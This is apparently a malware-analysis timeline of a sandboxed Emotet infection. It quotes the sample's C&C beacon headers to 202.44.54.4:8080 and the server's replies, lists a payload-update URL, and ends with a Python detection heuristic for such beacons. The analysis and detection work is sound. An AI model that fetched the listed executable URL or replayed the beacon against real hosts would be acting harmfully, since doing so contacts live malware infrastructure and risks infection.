# Timeline

## Fri Apr 10 09:54:27 CEST 2015

Started win2.

## Fri Apr 10 09:50:07 CEST 2015

Infected with 8baa9b809b591a11af423824f4d9726a.exe, probably Emotet.

So far the SYN requests went out to a series of remote hosts, all on port 8080/TCP, and there are more.

On 2015, Apr 14th 11:22am the C&C server 202.44.54.4, port 8080/TCP, started working: a POST request carrying encrypted data.

```
> POST /83736aa6/806782973.php HTTP/1.1
> Accept: */*
> User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
> Host: 202.44.54.4:8080
> Content-Length: 197
> Connection: Keep-Alive
> Cache-Control: no-cache
```

At first the answer was a 502:

```
HTTP/1.1 502 Bad Gateway
Server: nginx
Date: Tue, 14 Apr 2015 09:23:17 GMT
Content-Type: text/html
Content-Length: 568
Connection: keep-alive
```

And then the real communication:

```
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Apr 2015 09:36:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
```

A lot of information was sent at first.

A failed update: http://77.55.74.118/Xj3i4z6wPYy/8a1.exe
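As an added example (not part of the original timeline), the following Python turns the beacon traits visible in the quoted POST into a check that can be run over proxy or capture extracts: POST to a bare IP literal on 8080, a `/<8 hex>/<digits>.php` path, and a User-Agent claiming a Windows NT version that does not exist. The request text and the benign contrast request are constructed sample inputs; the trait names are the example's own.

```python
import re

# Constructed sample inputs: the beacon headers quoted in the timeline above,
# plus a benign request for contrast (not captured traffic).
BEACON = """POST /83736aa6/806782973.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)
Host: 202.44.54.4:8080
Content-Length: 197
Connection: Keep-Alive
Cache-Control: no-cache"""
BENIGN = """GET /index.html HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/5.0)"""

IP_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::(\d+))?$")
C2_PATH = re.compile(r"^/[0-9a-f]{8}/\d+\.php$")
NT_VER = re.compile(r"Windows NT (\d+\.\d+)")
# Real Windows NT kernel versions an MSIE-era UA can legitimately report.
KNOWN_NT = {"5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, lowercase header dict)."""
    lines = raw.strip().splitlines()
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def beacon_traits(raw):
    """Return the traits of the timeline's POST beacon that this request exhibits."""
    method, path, h = parse_request(raw)
    traits = []
    host = IP_HOST.match(h.get("host", ""))
    if method == "POST" and host:
        traits.append("post-to-bare-ip")          # Host header is an IP literal, no hostname
        if host.group(1) == "8080":
            traits.append("port-8080")            # same port the SYN sweep and C&C used
    if C2_PATH.match(path):
        traits.append("hexdir-numeric-php")       # /<8 hex chars>/<digits>.php
    nt = NT_VER.search(h.get("user-agent", ""))
    if nt and nt.group(1) not in KNOWN_NT:
        traits.append("bogus-nt-version")         # "Windows NT 7.1" was never shipped
    if h.get("cache-control", "").lower() == "no-cache" and h.get("accept") == "*/*":
        traits.append("nocache-accept-any")
    return traits
```

A request scoring three or more of these traits at once is worth pulling the body and the host's connection history for; each trait alone is common enough in legitimate traffic.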